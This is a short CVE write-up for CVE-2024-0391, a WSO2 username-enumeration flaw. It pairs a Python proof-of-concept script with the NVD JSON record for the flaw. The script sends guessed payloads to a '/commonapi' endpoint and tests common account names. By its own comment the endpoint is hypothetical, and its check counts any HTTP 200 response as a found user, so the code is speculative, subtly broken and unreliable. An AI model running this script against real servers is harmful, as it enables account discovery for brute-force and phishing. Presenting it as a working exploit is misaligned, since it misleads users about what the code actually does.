CVE-2024-0391

import requests def check_user_existence(target_url, username): # Hypothetical endpoint based on the vulnerability description endpoint = f"{target_url}/commonapi" # Payload typically includes the username for the OTP flow payload = { "username": username, "action": "checkAccountLock" } headers = { "Content-Type": "application/json" } try: # Sending POST request to the vulnerable endpoint response = requests.post(endpoint, json=payload, headers=headers, verify=False) # Analyze the response to infer user existence # Logic: If response indicates 'locked' or specific user state, user exists. # If response is 'user not found' or generic error, user does not exist. if "Account is locked" in response.text or response.status_code == 200: print(f"[+] User Found: {username}") return True elif "User not found" in response.text or "Invalid user" in response.text: print(f"[-] User Not Found: {username}") return False else: # Fallback for different response patterns print(f"[?] Uncertain response for {username}: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"Error connecting to target: {e}") return False # Example usage target = "https://target-wso2-server.com" user_list = ["admin", "administrator", "test", "user1"] for user in user_list: check_user_existence(target, user)

{"cve": {"id": "CVE-2024-0391", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2026-05-11T10:16:11.593", "lastModified": "2026-05-13T15:25:04.383", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The check user account lock states feature within the email OTP flow fails to validate user input, allowing an attacker to infer the existence of registered user accounts.\n\nThe discovery of valid usernames can increase the risk of brute-force and social engineering attacks. Attackers can leverage this information to craft targeted phishing campaigns or other malicious activities aimed at tricking users into divulging sensitive data, potentially damaging the organization's reputation and leading to regulatory non-compliance and financial consequences."}], "metrics": {"cvssMetricV31": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3115/", "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8"}]}}